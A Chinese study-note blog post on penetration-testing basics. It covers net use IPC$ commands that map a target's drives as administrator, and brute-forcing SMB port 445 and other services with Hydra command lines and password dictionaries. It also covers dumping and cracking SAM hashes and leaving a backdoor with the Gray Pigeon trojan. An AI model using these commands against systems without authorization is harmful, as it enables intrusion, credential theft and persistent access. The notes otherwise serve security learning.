十三·渗透测试基础

十三·渗透测试基础+密码暴力破解

0.授权(合法化)

1.信息收集

nslookup whois

2,扫描漏洞

先初级扫描

namp = ip范围 端口

scanport

再高级扫描

漏洞利用

提权(shell环境,cmd环境)

消除痕迹

(留后门)

渗透测试报告

*先scanport出ip地址和端口号

***talnet ip 端口号 探测对方端口是否打开(向对方发送一个探测包)**手动测试

445漏洞利用:ipc$:

net use \\ip地址\c$ 密码/user:administrator连接对方的盘符

映射对方c盘到我的账户

net use \\ip地址\ipc$ 密码/user:administrator连接对方的盘符

(从安全方面考虑,需要把账户名administrator改掉(可以改成guest)不建议用户名和公司名,个人姓名相关,增加暴力破解的难度)

net use 新建盘符 ip地址 \文件夹名 远程密码(空格) /user:远程账户 把远程的共享文件夹映射到本地

net use 映射列表

net use 被映射的盘符 /del 删除映射

*暴力破解系统密码之445

(黑客必用手段)

netscan:对445端口进行测试,包含一个用户名字典和一个密码字典

不停的对目标机的445端口进行net use测试,一直到这个测试的密码正确输出最终测试的密码

当正确的密码被渗透测试出来之后,用net use进行映射

把对方的硬盘全部映射到自己的电脑,也就是可以对该电脑进行随意操作,(以管理员身份)

通过木马留后门,以便之后不用再暴力破解

1.用scanport扫描ip和端口2.用真空密码字典生成密码字典3.通过netsan进行测试,暴力破解对方的445端口4.获取对方的密码,用net use映射对方盘符,获取对方的管理权限5.用灰鸽子软件制作木马留后门

定时任务

at \ \ ip地址 时间 “执行的任务”

net time \ \ ip地址 获取此ip地址的时间

at \\ ip地址 获取此ip地址的约定时间任务

at 看本地的

如果at后面的ip地址是空的则访问本地

常见渗透爆破端口号:

https 443

SQL Server 1433

Oracle 1521

My SQL 3306

rdp 3389

远程爆破:

Nmap

-sP ip/24 ping扫描 探测该ip局域网内哪些ip在线

-o ip 查看地址的系统 和系统端口号

-p port ip 查看ip的端口号是否打开 后面加-sV 扫描服务版本

-A ip 全面扫描

-oN 保存txt

hydra九头蛇

  1. Hydra.exe -l a (-L(可以加字典)) -p 123(-P(字典路径)) 10.1.1.1 (被爆破的ip地址)telnet(爆破的端口服务)
  2. Hydra.exe -l a -P d:\password.txt 10.1.1.1 rdp
  3. Hydra.exe -l a -P d:\password.txt 10.1.1.1 smb
  4. Hydra.exe -l a -P d:\password.txt 10.1.1.1 ftp
  5. Hydra.exe -l a -P d:\password.txt 10.1.1.1 ssh
  6. Hydra.exe -l a -P d:\password.txt 10.1.1.1 mysql
  7. Hydra.exe -L d:\user.txt -P d:\password.txt 10.1.1.1 mysql

本地爆破:

GETPASS获取缓存中的密码

saminside:对哈希值爆破

pwdump:获取哈希值(LM哈希值 NT哈希值 NT哈希值才是目前使用的)

sam文件中格式:用户名 用户id LM哈希 NT哈希

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值